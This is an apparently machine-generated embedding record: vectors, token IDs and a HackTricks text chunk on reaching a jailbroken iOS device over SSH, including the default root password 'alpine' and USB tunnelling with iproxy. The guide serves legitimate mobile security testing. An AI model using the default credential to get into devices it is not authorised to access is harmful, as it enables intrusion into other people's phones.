-0.03155674412846565, 0.739408016204834, 0.5945014953613281, 0.6874785423278809, 0.7364850044250488, -0.5257928371429443, -0.35201945900917053, 0.32841044664382935, -0.22358256578445435, 0.08781347423791885, 0.0851966142654419, 0.6563807129859924, 0.24821685254573822, -0.2557404041290283, 0.7247155904769897, -0.028765710070729256, 0.2675507068634033, 0.22177693247795105, 0.6525508165359497, 0.138679638504982, 0.18683189153671265, 0.2704302668571472, 0.7244413495063782, -0.4049396812915802, -0.6277943849563599, -0.2618488669395447, 1.2706003189086914, 0.547037661075592, -0.253694623708725, -0.8325128555297852, -0.2699715197086334, 0.121198371052742, 0.29755696654319763, -0.05104222893714905, 0.46970367431640625, 0.5028700232505798, 0.16837404668331146, 0.5044909715652466, -0.2768564224243164, -0.3040264844894409, -0.9876399040222168, -0.12579676508903503, -1.011147379875183, -0.6180989146232605, -0.6616851687431335, -0.20316413044929504, 0.47979867458343506, 0.33997809886932373, 0.6023518443107605, -0.39205169677734375, -0.27744778990745544, 0.13027314841747284, 0.0063936589285731316, 0.5435190796852112, 0.012821252457797527, 0.2843332886695862, -0.4964083731174469, 0.4355808198451996, 0.3216543197631836, 0.9670714139938354, 0.03977084159851074, -0.09798791259527206, -0.3210580050945282, -0.1923786699771881, -0.2470335215330124, -0.6277743577957153, 0.6789319515228271, 0.140907883644104, -0.08230557292699814, 0.2813262939453125, -0.0751105472445488, 0.1604536473751068, 0.1924210488796234, -0.012429753318428993, -0.4940304756164551, 0.8989981412887573, 0.283609002828598, -0.011236779391765594, 0.3025496006011963, 0.4132995307445526, -0.40085849165916443, 0.04892321676015854, 0.09857964515686035, 0.6589540243148804, -0.15980824828147888, 0.5563252568244934, 0.390656441450119, -0.08291266113519669, 0.06532851606607437, 0.1462760865688324, 0.059085145592689514, -0.7533184885978699, -0.34451842308044434, -0.2324899435043335, -0.14046399295330048, -0.36006301641464233, 0.06594951450824738, -0.9740213751792908, 0.30454158782958984, -0.22386108338832855, -0.5145758986473083, 0.03948740288615227, -0.19913893938064575, 0.7600743174552917, -0.38863903284072876, -0.27575650811195374, -0.13351403176784515, -0.5180224776268005, 0.8319218754768372, 0.19305051863193512, 0.25116339325904846, -0.7471317052841187, -0.2194119542837143, 0.10149626433849335, -0.5550503134727478, 0.4643896818161011, -0.1281152367591858, -0.38933315873146057, 0.3161163032054901, -0.4412429630756378, -0.3937205374240875, -0.004713615868240595, 0.41987988352775574, 0.09835990518331528, 0.2848745882511139, 0.28649255633354187, -0.8363447189331055, -0.4371621608734131, 0.010069883428514004, 0.29096826910972595, 0.6174373030662537, -0.22297343611717224, 0.19144119322299957, 0.7164887189865112, 0.21343831717967987, -0.609436571598053, 0.04796577990055084, 0.48560476303100586, 0.2099849432706833, 0.14431706070899963, 0.14805373549461365, 0.08670106530189514, 0.4809439778327942, 0.8926532864570618, -0.42122170329093933, -0.58430016040802, 0.6325581669807434, 0.12854427099227905, 0.43335479497909546, -0.3592805862426758, 0.512826144695282, -0.5988777875900269, -0.31392401456832886, 0.556632399559021, 0.06078717112541199, -0.026222340762615204, -1.2194242477416992, -0.6427372694015503, 0.04283817857503891, -0.34998658299446106, 0.759107232093811, -0.11491905152797699, -0.10652318596839905, -0.6741785407066345, -0.8859968185424805, -0.7365585565567017, 0.6715948581695557, 0.7429330348968506, 0.8375772833824158, 0.4610500931739807, 1.0926591157913208, 0.21903400123119354, -0.9245331883430481, 0.15852083265781403, -1.182213306427002, -0.10220595449209213, -0.16018052399158478, 1.0196901559829712, -0.7232428789138794, -0.7905078530311584, -0.02231927588582039, -0.45280757546424866, -0.7910785675048828, -0.11911480128765106, -0.09646683186292648, 0.15758298337459564, -0.5032554268836975, -0.8301071524620056, -0.319041907787323, -0.6124239563941956, -1.262172818183899, 0.4476809501647949, -0.5032521486282349, -0.14295357465744019, 0.8113221526145935, -0.7051206231117249, 0.249810591340065, -0.5282627940177917, 0.13100776076316833, 0.4682437777519226, 0.0652218908071518, -0.4974523186683655, -0.14415520429611206, -0.008289270102977753, -0.599257230758667, -0.24558401107788086, 0.6035192012786865, 0.14629976451396942, 0.09790994226932526, -0.927909255027771, 0.5275271534919739, 0.6722214818000793, -0.26270368695259094, -0.48400622606277466, 0.09500794112682343, -0.002533355727791786, -0.07823040336370468, 0.44727790355682373, -0.4995099604129791, -0.33852431178092957, 0.2229018658399582, -1.2715582847595215, 0.6998825073242188, -0.6352756023406982, -0.1680711954832077, 0.1795489341020584, -0.20115919411182404, -0.03554808720946312, 0.33197879791259766, -0.5422847867012024, 0.13276532292366028, -0.3751586377620697, 0.526078999042511, -0.2290835678577423, -0.28130531311035156, 0.8679879903793335, -0.6134892702102661, 0.1605074256658554, -0.0122750885784626, 0.3017660677433014, -0.24286024272441864, -0.08349617570638657, -0.1387350857257843, -0.655249834060669, 0.4252431094646454, -0.7712711691856384, 0.7788076400756836, 0.09010281413793564, -0.21156586706638336, 0.1769384741783142, -0.2468787282705307, 0.8608294129371643, -0.14646978676319122, 0.5537125468254089, -1.4952056407928467, -0.722281277179718, 0.07289978861808777, 0.5583071708679199, -0.42173218727111816, 0.8125160932540894, -0.03474753350019455, -0.09898046404123306, -0.6439903974533081, -0.09457773715257645, -0.7255603075027466, -0.4728785753250122, -0.7405216693878174, -0.46091148257255554, 0.40364232659339905, -0.08173668384552002, 0.8673539757728577, 0.12523353099822998, -0.6270018815994263, 0.8410225510597229, 0.031038353219628334, -0.10014242678880692, -0.886547327041626, 0.17204666137695312, -0.4435645341873169, -0.30808597803115845, 0.28607892990112305, 0.48728224635124207, 0.6038784980773926, 0.3311838209629059, -0.24384349584579468, 0.13266009092330933, 0.24599173665046692, -0.19878268241882324, -0.5997881293296814, 0.4896114766597748, 0.044247955083847046, -1.0120571851730347, -0.041684914380311966, 0.3517843782901764, 0.1405714750289917, -0.3233216404914856, -0.3655564486980438, -0.30678901076316833, -1.171072006225586, -0.8079220652580261, 0.15938571095466614, -0.6071184873580933, 0.5381978750228882, -0.717262327671051, -0.23746345937252045, -0.2802160382270813, 0.6090171933174133, -0.06400177627801895, -0.8660154938697815, 0.29741889238357544, 0.10653600096702576, 0.11452119052410126, -0.2483835369348526, -0.5630875825881958, -0.3118639886379242, -0.31986933946609497, -0.12648914754390717, 0.11059372872114182, 0.1096143126487732, -0.3818262219429016, -0.026022061705589294, -0.17634648084640503, 0.2327454388141632, -0.6578563451766968, -0.4319421052932739, -0.013707434758543968, -0.4461163878440857, 0.33107396960258484, -0.5853039026260376, 0.2007066011428833, -0.38955870270729065, 0.5263059139251709, -0.02287917584180832, -0.3654238283634186, 0.2341553121805191, -0.551870584487915, -0.03303714469075203, 0.508986234664917, 1.2156862020492554, -0.7602240443229675, -0.13260027766227722, 0.17036862671375275, 1.3604612350463867, 0.7592906951904297, 0.1005171537399292, -1.150899887084961, -0.05080605670809746, -0.6620930433273315, -0.7215659618377686, -0.01710663177073002, 0.32562991976737976, -0.02817307971417904, 0.6044539213180542, 0.5908149480819702, -0.09013723582029343, -0.24766795337200165, 0.08230751007795334, 0.5523036122322083, 0.198548823595047, 0.69938725233078, -1.195400595664978, 0.4898653030395508, 1.0593454837799072, -0.16371513903141022, 0.4088797867298126, -0.8185948729515076, -0.24738453328609467, 0.20820653438568115, -0.6279171109199524, -0.3577066957950592, -0.8051050901412964, -0.4794691205024719, 0.6897579431533813, 0.49205127358436584, 0.6526967287063599, -0.2084953784942627, -1.024646520614624, 0.06338196247816086, -0.24306505918502808, -0.21852974593639374, 0.1725609451532364, 0.3430582582950592, -0.24157989025115967, 0.11848727613687515, -0.5929980278015137, 0.016082236543297768, -0.23293955624103546, -0.17110677063465118, 0.66191565990448, 0.1104389876127243, -0.629728376865387, 1.643301248550415, 0.21452949941158295, -0.45063164830207825, -0.055252235382795334, -0.052073393017053604, -0.06616198271512985, -0.48856204748153687, -0.6016244292259216, -0.18492652475833893, 0.3138318359851837, 0.2471112161874771, -0.07223991304636002, 0.7425923943519592, 0.18380510807037354, 0.2797195315361023, -0.8937521576881409, 0.5598863959312439, -0.07146264612674713, 0.20610901713371277, 0.2101045399904251, -0.8725095391273499, -0.6050058603286743, -1.0755864381790161, -0.7661116123199463, 0.24243620038032532, -0.2272627353668213, 0.8381035327911377, -0.4689497947692871, 0.5611170530319214, -0.28216636180877686, 0.07419980317354202, 0.5995370745658875, 0.37428760528564453, -0.02916616015136242, 0.9180806279182434, 0.5232813358306885, -0.8451260924339294, -0.02845700830221176, 0.862133800983429, -0.040388911962509155, 0.6345218420028687, -0.4522345960140228, 0.005373026244342327, -0.029567314311861992, 0.716116726398468, -0.3849664330482483, 0.21036025881767273, -1.1634161472320557, -0.1354333460330963, 0.09109259396791458, 0.13533347845077515, 0.1489897072315216, -0.8128651976585388, 0.1755712628364563, 0.10996547341346741, -0.364599347114563, -0.17522622644901276, -0.018086310476064682, -0.6177377700805664, -0.1323990821838379, -0.5460648536682129, 0.04666002467274666, -0.4161750078201294, -0.5424993634223938, -0.1051323413848877, -0.7897648215293884, -0.542884349822998, -0.6341409683227539, -0.7285280227661133, -0.03292706608772278, -0.7939598560333252, 0.9413614273071289, -0.6553696393966675, 0.022502418607473373, -0.4516507685184479, -0.5165399312973022, 0.24693281948566437, 0.9599976539611816, 0.21841008961200714, 0.15355511009693146, 0.38829219341278076, 0.5251151919364929, 0.5605729818344116, -0.6585988998413086, 0.11830595880746841, 0.5292603373527527, -0.2559325695037842, 0.08815917372703552, 0.3002842366695404, -0.0690181776881218, 0.1647167056798935, 0.14281168580055237, -0.9124860763549805, 0.382082998752594, -0.5415669679641724, -0.019190572202205658, 0.28117692470550537, -0.10604317486286163, -0.17664489150047302, 0.3615754544734955, 0.9513943195343018, 0.1800183206796646, -0.5948699712753296, -0.3970734477043152, 0.3653818666934967, -0.07463940232992172, -0.1231979951262474, 0.14688317477703094, -0.11146242171525955, -0.1830374151468277, -0.27983757853507996, 0.2938150465488434, -0.5442062616348267, 0.3656369149684906, -0.6511788368225098, -0.07548414915800095, -0.2805159091949463, -0.4274407923221588, 0.39332500100135803, -0.16246412694454193, 0.3883807063102722, 0.3705042898654938, 0.4791158437728882, 0.3171161115169525, -1.084293246269226, 0.03317008167505264, -0.8677343130111694, -0.2939198315143585, 0.37599024176597595, 0.025263849645853043, -0.7413282990455627, -0.16489066183567047, -0.4533172845840454, -0.10366906970739365, -0.18027015030384064, 0.21972684562206268, 0.24456214904785156, 0.6604940295219421, -0.3269687294960022, 0.5984635949134827, -0.6629520654678345, 0.07043781131505966, -0.20778170228004456, 0.761081874370575, -0.22640010714530945, -1.0639728307724, 0.15102608501911163, 0.6045679450035095, 0.31014692783355713, -0.014404995366930962, -0.1700466126203537, 0.5092532634735107, 0.31029537320137024, -0.11305756121873856, 0.3295547664165497, 0.19911833107471466, -0.6077705025672913, 0.3720766603946686, -0.4566996395587921, 0.1891249120235443, -0.17385391891002655, 0.22905242443084717, 0.1829213947057724, -0.2708601653575897, -0.29757827520370483, 0.11649984121322632, 0.11053499579429626, -0.24616727232933044, 0.7605178356170654, 0.32721784710884094, 0.4721144139766693, -0.2876218259334564, 0.04032948985695839, -0.4252634048461914, 0.4541650116443634, 0.1699090152978897, -0.08871295303106308, -0.1945399045944214, 0.9974460601806641, 0.5392127633094788, -0.6132352352142334, 0.3523331880569458, 0.5859830379486084, -0.0789947584271431, -0.5699572563171387, 0.01918216235935688, -0.9815933108329773, 0.05476405844092369, 0.30615824460983276, -0.5140008330345154, 0.14260660111904144, -0.025140982121229172, 0.1115352064371109, 0.2812114357948303, -0.06285563111305237, 1.0367166996002197, -1.0002280473709106, 0.8192967772483826, 0.1547793596982956, 0.009975727647542953, 0.1227671280503273, 0.2174254059791565, -0.1923474371433258, 0.4691894054412842, 1.3334851264953613, 0.5418654680252075, 0.43509960174560547, 0.5500192642211914, -0.609930157661438, 0.07687914371490479, 0.6693925857543945, 0.13049733638763428, -0.7946851849555969, 0.815271258354187, 0.250902384519577, -1.0366947650909424, -0.45284345746040344, 0.25206395983695984, 0.4641619324684143, -0.5303432941436768, 0.7235358357429504, -0.24090825021266937, -0.30547088384628296, -0.6461426615715027, 0.527255654335022, -0.274167537689209, 0.20141007006168365, -0.03878616914153099, -0.6599836349487305, -0.7666023969650269, 1.306592345237732, -0.26048052310943604, 0.5301110744476318, 0.41953369975090027, -0.03853875398635864, 0.4520682990550995, 0.8834578394889832, 0.1736023724079132, -0.5790141820907593, -0.4609067142009735, 0.09434349834918976, 0.010464608669281006, 0.014809037558734417, -0.5187675952911377, -0.42512181401252747, 0.5071541666984558, -0.008809593506157398, 0.015592304058372974, -0.20318344235420227, -0.4286902844905853, -0.36045652627944946, -0.8452991843223572, -0.5534235835075378, -0.024762632325291634, 0.3382542133331299, 0.2982548475265503, -0.3090531826019287, 0.2094867080450058, 0.4138930141925812, -0.35155409574508667, -0.24917711317539215, -0.5114663243293762, -0.19730621576309204, 0.13057273626327515, 1.0687700510025024, -0.26164481043815613, -0.20623187720775604, 0.3516451120376587, -0.7944675087928772, -0.4638642370700836, 0.005838973913341761, -0.4978444278240204, 0.06541622430086136, 0.4437861442565918, -0.008389568887650967, 0.8881146907806396, 1.1861101388931274, 0.5265722870826721, 0.21728068590164185, 0.6062148213386536, 0.9920812845230103, -0.465773344039917, 0.8404117822647095, 0.5520042777061462, 0.08019006997346878, 0.1862090826034546, -0.5495114326477051, 0.8872585296630859, -0.6772724390029907, 0.15000391006469727, 0.151358500123024, -0.6271328330039978, -1.1246225833892822, -0.8985186219215393, -0.2685590088367462, 0.02523006871342659, 0.11227147281169891, 0.140755295753479, -0.46964192390441895, 0.6640027761459351, -0.7388603091239929, 0.09139809757471085, -0.2830727696418762, -0.03091461956501007, -0.08562742918729782, 0.18675388395786285, 0.5258743166923523, -1.4883270263671875, 4.220644950866699, 0.4193449020385742, 0.369905948638916, 0.014749589376151562, -0.3176614046096802, 0.2854943871498108, 0.8046975135803223, -0.8133600354194641, -0.161934494972229, -0.4840236306190491, -0.1393047422170639, -0.03542559966444969, 0.7504756450653076, -0.5456488728523254, 0.567047119140625, 0.3751511573791504, -0.06856560707092285, -0.05324571207165718, 0.5374370813369751, -0.544620156288147, -0.9834995269775391, 0.3355483412742615, -0.908969521522522, 0.7917886972427368, 0.028548547998070717, 0.632699191570282, 0.843308687210083, -0.648695707321167, -0.3869740664958954, -0.08456572890281677, 0.163296639919281, -0.4783483147621155, 0.5182209014892578, -0.688776969909668, -0.20783637464046478, 0.28213247656822205, 0.31082066893577576, -0.8871915936470032, -0.44681212306022644, 0.3989928066730499, 0.7958893775939941, -0.20904576778411865, 0.4248540699481964, -0.3581996560096741, -0.38104623556137085, 0.7309194207191467, -0.7049364447593689, 0.008532329462468624, 1.0541465282440186, -0.29126444458961487, 0.7307927012443542, -0.4718398451805115, 0.2704348564147949, 0.07530328631401062, -0.8311047554016113, 0.7206423282623291, -0.21647979319095612, -0.4640809893608093, -0.45191100239753723, -0.3865780830383301, 0.695871889591217, -0.7581062912940979, 0.536880612373352, -0.5933895111083984, -0.7266509532928467, 0.44868090748786926, -0.5643147230148315, 1.1432698965072632, 0.03162825107574463, -0.13654260337352753, -0.5928656458854675, 0.10013354569673538, -0.8531150817871094, -0.3542138636112213, 1.3158457279205322, -0.11051595956087112, -0.36071518063545227, 0.7687122821807861, 0.20352476835250854, -0.7728728652000427, 0.127811461687088, -0.6858487129211426, -0.7818560004234314, -0.002653632778674364, 0.7247372269630432, 0.10529785603284836, -0.06456498801708221, -1.374937891960144, 0.2383197396993637, 0.1140723004937172, 0.5144108533859253, 0.5144195556640625, -0.2919924855232239, -0.17836666107177734, 0.21296004951000214 ]
[ 101, 16380, 3937, 5604, 3136, 18150, 3436, 1996, 20904, 3593, 1997, 2019, 16380, 5080, 4842, 14192, 2023, 4506, 2383, 4198, 1996, 5080, 2000, 1996, 3274, 3081, 18833, 1998, 2383, 1996, 5080, 14058, 1012, 1996, 20904, 3593, 2003, 1037, 2871, 1011, 15340, 4310, 5537, 1997, 4144, 1998, 3616, 2000, 6709, 2019, 16380, 5080, 1012, 2017, 2064, 2424, 1996, 20904, 3593, 1997, 2115, 16380, 5080, 2006, 6097, 2891, 22326, 9921, 1999, 1996, 2424, 2121, 10439, 1010, 2004, 11943, 2003, 2025, 2800, 4902, 1999, 22326, 1012, 2074, 7276, 1996, 4198, 16380, 5080, 1999, 2424, 2121, 1998, 11562, 2006, 1996, 2592, 2104, 1996, 2171, 1997, 1996, 16380, 5080, 2000, 2009, 22139, 2083, 2009, 1012, 4661, 1996, 20904, 3593, 1010, 2017, 2064, 2424, 1996, 7642, 2193, 1010, 10047, 7416, 1998, 2060, 6179, 2592, 1012, 2065, 2017, 2024, 2478, 1037, 6097, 2891, 2544, 2077, 22326, 1010, 2017, 2064, 2424, 1996, 20904, 3593, 1997, 2115, 16380, 5080, 3081, 11943, 1010, 2011, 17739, 2115, 5080, 1998, 22042, 2006, 1000, 7642, 2193, 1000, 1999, 1996, 12654, 21628, 1012, 2043, 22042, 2006, 2023, 2017, 2097, 2009, 22139, 2083, 2367, 27425, 1997, 1996, 16380, 5080, 2164, 2049, 20904, 3593, 1012, 2009, 2003, 2036, 2825, 2000, 2131, 1996, 20904, 3593, 3081, 2536, 3094, 2240, 5906, 2006, 6097, 2891, 2096, 1996, 5080, 2003, 4987, 3081, 18833, 1024, 2011, 2478, 1996, 1045, 1013, 1051, 15584, 10566, 6994, 22834, 2890, 2290, 1024, 1002, 22834, 2890, 2290, 1011, 1052, 22834, 2271, 2497, 1011, 1048, 1064, 24665, 13699, 1000, 18833, 7642, 1000, 1064, 1000, 18833, 7642, 2193, 1000, 1027, 1000, 1023, 2063, 2620, 8447, 22932, 18827, 2575, 3401, 2063, 2620, 17134, 2063, 2475, 2546, 2620, 2278, 16932, 2692, 23352, 11387, 29292, 2475, 2546, 2620, 18139, 26224, 8586, 1000, 2011, 2478, 8909, 17726, 12377, 9153, 10820, 1006, 2036, 2800, 2006, 11603, 1007, 1024, 1002, 24702, 16500, 8909, 17726, 12377, 9153, 10820, 1002, 8909, 17726, 2063, 1035, 8909, 1011, 1048, 23980, 2546, 24096, 2497, 2094, 16048, 2692, 2683, 16703, 2094, 2475, 29292, 2475, 2546, 2683, 2629, 2546, 2487, 2546, 16932, 2475, 9818, 24594, 2497, 2487, 2278, 2575, 2475, 18939, 27421, 2100, 2478, 1996, 2291, 1035, 6337, 2099, 1024, 1002, 2291, 1035, 6337, 2099, 11867, 2271, 2497, 2850, 29336, 18863, 1064, 7367, 2094, 1011, 1050, 1011, 1041, 1005, 1013, 25249, 1013, 1010, 1013, 7642, 1013, 1052, 1025, 1013, 18059, 1013, 1010, 1013, 7642, 1013, 1052, 1025, 1013, 26322, 1013, 1010, 1013, 7642, 1013, 1052, 1005, 1064, 24665, 13699, 1000, 7642, 2193, 1024, 1000, 10476, 1011, 5641, 1011, 5511, 2184, 1024, 2324, 1024, 6021, 1012, 6227, 2692, 2291, 1035, 6337, 2099, 1031, 14078, 22203, 1024, 8746, 2692, 19481, 2575, 1033, 11867, 2271, 2497, 24844, 6610, 1024, 25941, 29313, 24759, 15916, 5498, 10111, 12881, 10732, 29278, 8043, 7903, 2063, 3478, 1014, 2595, 2063, 8889, 8889, 2475, 4783, 7642, 2193, 1024, 4185, 26187, 26976, 17465, 3207, 2575, 12879, 2629, 2063, 26976, 2050, 2620, 2581, 2549, 2094, 2575, 2509, 2546, 2487, 2063, 2487, 2497, 14141, 16932, 2546, 2581, 10790, 2509, 2497, 2487, 3762, 2478, 5693, 1024, 1002, 5693, 1011, 1055, 5733, 6305, 9623, 7741, 1996, 5080, 5806, 10354, 3334, 7173, 23890, 2075, 1996, 5080, 2017, 2323 ]
hack_tricks
436.txt
0
have installed some new app manager like cydia. sshin order to enable ssh access to your ios device you can install the openssh package. once installed, you can access your device via ssh running ssh root @ < device _ ip _ address >, which will log you in as the root user : $ ssh [ email protected ] [ email protected ]'s password : iphone : ~ root # when accessing your ios device via ssh consider the following : the default users are root and mobile. the default password for both is alpine. remember to change the default password for both users root and mobile as anyone on the same network can find the ip address of your device and connect via the well - known default password, which will give them root access to your device. connect to a device via ssh over usbduring a real black box test, a reliable wi - fi connection may not be available. in this situation, you can use usbmuxd to connect to your device's ssh server via usb. connect macos to an ios device by installing and starting iproxy : $ brew install libimobiledevice $ iproxy 2222 22waiting for connectionthe above command maps port 22 on the ios device to port 2222 on localhost. you can also make iproxy run automatically in the background if you don't want to run the binary every time you want to ssh over usb. with the following command in a new terminal window, you can connect to the device : $ ssh - p 2222 root @ localhostroot @ localhost's password : iphone : ~ root # small note on usb of an idevice : on an ios device you cannot make data connections anymore after 1 hour of being in a locked state, unless you unlock it again due to the usb restricted mode, which was introduced with ios 11. 4. 1on - device shell appwhile usually using an on - device shell ( terminal emulator ) might be very tedious compared to a remote shell, it can prove handy for debugging in case of, for example, network issues or check some configuration. for example, you can install newterm 2 via cydia for this purpose ( it supports ios 6. 0 to 12. 1. 2 at the time of this writing ). in addition, there are a few jailbreaks that explicitly disable incoming ssh for security reasons. in those cases, it is very convenient to have an on
[ -0.029675867408514023, 0.004294064827263355, 0.03239671513438225, -0.13543152809143066, -0.026389963924884796, 0.015893450006842613, 0.20299971103668213, 0.7973899841308594, 0.44497719407081604, 0.9589694142341614, 0.08580095320940018, -0.13252903521060944, -0.068515345454216, -0.5075767636299133, -0.6064419746398926, 0.14202946424484253, -0.5250170230865479, -0.3218716084957123, -0.1585046499967575, 0.16782695055007935, 1.3773198127746582, -0.06570659577846527, -0.4667147099971771, -0.6062886714935303, -0.06953763961791992, 0.24339044094085693, 0.46308350563049316, 0.09618441015481949, 0.507940948009491, 0.991461455821991, 0.387180358171463, 0.3098149001598358, 0.7486692070960999, -0.8314987421035767, 0.20454785227775574, -0.4610474407672882, 0.4664324223995209, -0.6840931177139282, -0.310577929019928, -0.5493831038475037, 0.7933121919631958, 0.25744786858558655, -0.019165555015206337, -0.47040653228759766, -0.561468780040741, -0.6405770778656006, -0.4760682284832001, 0.169161856174469, 0.0688827782869339, 0.023320212960243225, -0.04924889653921127, -0.3267867863178253, -0.02045120857656002, 0.17449022829532623, 0.7193562984466553, 0.4908708333969116, 0.10583212971687317, -0.6829297542572021, -0.643437385559082, 0.4560282826423645, -0.08117320388555527, 0.17605333030223846, 0.2257184535264969, -0.9167402386665344, 0.5703535676002502, 0.5933970808982849, -0.2152024805545807, -0.460588276386261, -0.7380190491676331, -0.31394362449645996, -0.5140620470046997, 0.6736490726470947, -0.14460603892803192, -1.0592013597488403, -0.1111365556716919, 0.06326194852590561, -0.032492496073246, 0.008849584497511387, 0.004167837556451559, 0.7407965064048767, 0.12001660466194153, 0.48527994751930237, 0.011128303594887257, -0.21456263959407806, -0.5267516374588013, 0.22361375391483307, -0.058780450373888016, -0.26895415782928467, -0.9510864615440369, -0.41762834787368774, 0.8443682193756104, 0.1957653909921646, -0.8820232152938843, -0.21799494326114655, 1.1113409996032715, 1.1169148683547974, -0.9259724617004395, 0.1211695671081543, 0.2500090003013611, -0.31188899278640747, 0.25349387526512146, 0.17614266276359558, 0.47232353687286377, 0.4633484184741974, 0.07441316545009613, 0.3785189390182495, 0.5368197560310364, -0.009488499723374844, -0.16867683827877045, -0.5434789061546326, 0.2745233476161957, -0.6090410351753235, 0.05474701523780823, -0.214259535074234, -0.5067112445831299, 0.21749275922775269, 1.1428848505020142, 0.5201082229614258, -0.3793826997280121, 0.616191565990448, -0.2793157696723938, -0.30872222781181335, 0.6507001519203186, -0.35930168628692627, -0.385847270488739, 0.41719144582748413, 0.42243966460227966, 0.19323572516441345, -1.2327195405960083, -0.2619248032569885, -0.17867079377174377, -0.4935080111026764, 0.13946585357189178, 1.0320581197738647, -1.136026382446289, 0.6848840713500977, 0.029654858633875847, 0.007236323785036802, 1.1037540435791016, -0.9404499530792236, -0.16180847585201263, 0.7441921830177307, 0.0988200232386589, 1.1303796768188477, 0.29285910725593567, -0.00786919891834259, -0.5698734521865845, -0.4540405571460724, -0.3492124378681183, 0.5262212753295898, 0.6102278828620911, 0.7601646184921265, 0.044803768396377563, -0.39647483825683594, 0.07523705810308456, 0.08789011090993881, -0.3364163637161255, 1.1909196376800537, -0.1105993315577507, 0.7017053365707397, -0.3880179822444916, 1.180018663406372, 0.33461254835128784, 0.048576466739177704, 0.23620525002479553, 0.6324167251586914, -0.7142858505249023, -0.17480160295963287, 0.018786946311593056, 0.058399517089128494, -0.1904572993516922, -0.011106971651315689, 0.36080223321914673, -0.29933249950408936, 0.8376388549804688, 0.7924347519874573, 0.32520437240600586, 0.245028555393219, 0.003144844900816679, 0.11896080523729324, -0.5528091788291931, 0.3750603497028351, 0.6774449348449707, 0.9124327301979065, -0.28610557317733765, -0.11844682693481445, 0.24720412492752075, -0.4408635199069977, -0.3793306052684784, -0.12051090598106384, -0.6743841767311096, 0.7914115190505981, -0.9053430557250977, 0.1718972772359848, 0.37908855080604553, -0.1826430857181549, -0.6343967914581299, 0.18125127255916595, -0.20434415340423584, -0.766990065574646, -0.3360188603401184, 0.35137006640434265, 0.23337437212467194, 0.588045060634613, 0.11399739235639572, -0.44463586807250977, 0.9590014815330505, 0.7474676966667175, 0.021959368139505386, 0.3661480247974396, 0.8451140522956848, -0.37843284010887146, -1.2926238775253296, -0.23519176244735718, 0.04382171109318733, -0.23513291776180267, 0.01491651963442564, 0.9503523707389832, -0.18706053495407104, 0.00984271988272667, -0.05718425288796425, 0.6893532276153564, 0.8205293416976929, 0.2156093716621399, -0.9462456703186035, -0.09803624451160431, -0.4781579375267029, 0.03478085622191429, -0.3669450581073761, -0.2760966420173645, -0.4364681541919708, 0.8769075274467468, 0.1521814912557602, 1.2457059621810913, 0.04567721113562584, -0.7175681591033936, -0.12909236550331116, 0.29667145013809204, 0.09454741328954697, -0.04440223425626755, -0.0888381227850914, 0.7958022356033325, -0.438838928937912, 0.1343362182378769, 0.40880781412124634, -0.10826922953128815, 0.1498766392469406, 0.7416912913322449, 0.5198162198066711, 0.6114067435264587, -0.9278729557991028, 0.5490972399711609, 0.5004153847694397, -0.19462214410305023, -0.886648952960968, -0.18287868797779083, 0.6845511794090271, 0.01678277552127838, -1.192423939704895, -0.7291565537452698, -0.190958172082901, -0.19925466179847717, 0.1901237964630127, 0.8437483906745911, 0.043229129165410995, 0.42027732729911804, -0.5704153776168823, 1.1858084201812744, 0.0013659779215231538, -0.2505435347557068, -0.9545910358428955, 0.21104206144809723, -0.6795846223831177, -0.42860832810401917, -1.1392590999603271, 0.023084165528416634, 0.04036545008420944, -0.08955130726099014, 0.35900139808654785, -0.9675874710083008, 0.14894676208496094, -0.21104878187179565, 0.9854348301887512, 0.5686771869659424, 0.11322291940450668, -0.13933853805065155, -0.539440929889679, 0.11636622995138168, -0.24832876026630402, 0.9194180369377136, -0.7139507532119751, 0.2532770335674286, -0.1450110226869583, -0.5397042632102966, 0.09399253129959106, -0.6186628937721252, 0.4149097204208374, 0.08629516512155533, -0.099520742893219, 0.31715062260627747, -0.18530505895614624, 0.18247993290424347, 0.3890777826309204, 0.015278917737305164, -0.03664810582995415, 0.48470717668533325, 0.6542240977287292, -0.08312061429023743, 1.2520073652267456, 0.16350752115249634, -0.5730412006378174, 0.34849244356155396, 0.21103554964065552, 0.6213618516921997, -0.5665364265441895, 0.5681284070014954, 0.648310661315918, 0.23710089921951294, -0.30752089619636536, -0.397451251745224, -0.34298884868621826, -1.048510193824768, -0.2843192517757416, 0.011394551955163479, 0.10191600024700165, 0.7541974782943726, -0.24138444662094116, -1.1702016592025757, 0.38534826040267944, -0.6984838247299194, -0.7609012126922607, 0.10840742290019989, -0.13277173042297363, 0.7510897517204285, 0.029644129797816277, -0.051638782024383545, 0.1616433709859848, -0.3963760733604431, 0.2386922538280487, 0.7980890274047852, 0.381325364112854, -0.8370638489723206, 0.5247104167938232, -0.0019539620261639357, -0.34427186846733093, 0.2932817339897156, -0.11831454932689667, -0.6787217855453491, -0.5148199200630188, 0.017200902104377747, -0.27862435579299927, -0.7407994866371155, 0.5926754474639893, 0.40881967544555664, 0.8004757165908813, 0.3225056529045105, -0.7168679237365723, -0.21238186955451965, 0.3005666136741638, 0.4735611379146576, 0.3638990521430969, -0.16100357472896576, 0.33977434039115906, 0.6231698393821716, 0.020519765093922615, -0.36603936553001404, -0.6357461810112, 0.4383337199687958, 0.6324923038482666, -0.07295867800712585, 0.4903374910354614, -0.29820090532302856, 0.40933138132095337, 0.7461656928062439, -0.4196859896183014, -0.40368741750717163, 0.9970351457595825, 0.38568031787872314, 0.5557522773742676, -0.1212841123342514, 0.489136278629303, -0.6713496446609497, -0.042178865522146225, 0.45215484499931335, 0.8033733367919922, -0.21083775162696838, -1.2296741008758545, -0.4211031198501587, -0.3251078426837921, -0.018081948161125183, -0.048565007746219635, 0.38134267926216125, 0.25647953152656555, 0.18992280960083008, -1.1473512649536133, -0.7118529081344604, 0.5145487785339355, 0.48393329977989197, 0.6243064403533936, 0.12558351457118988, 1.0544383525848389, 0.21314115822315216, -0.20830965042114258, 0.08234725147485733, -0.5024123787879944, 0.1526898443698883, -0.01649104617536068, 0.8009488582611084, -0.26548829674720764, -0.35388144850730896, -0.2886280119419098, 0.011081516742706299, -0.6409046053886414, 0.3627077043056488, -0.30490222573280334, 0.15850839018821716, -0.1811964362859726, -0.5472047328948975, -0.3378515839576721, 0.032640744000673294, -1.000450611114502, -0.533905565738678, -0.2865796983242035, 0.22357599437236786, 0.8785152435302734, 0.14399974048137665, -0.007899866439402103, -0.2752295434474945, 0.26394137740135193, -0.07331116497516632, -0.15941627323627472, -0.5853633284568787, -0.3407672345638275, -0.4946053624153137, -0.5448139309883118, -0.179525688290596, 0.21015268564224243, 0.4434688091278076, -0.24806231260299683, -0.4237520396709442, 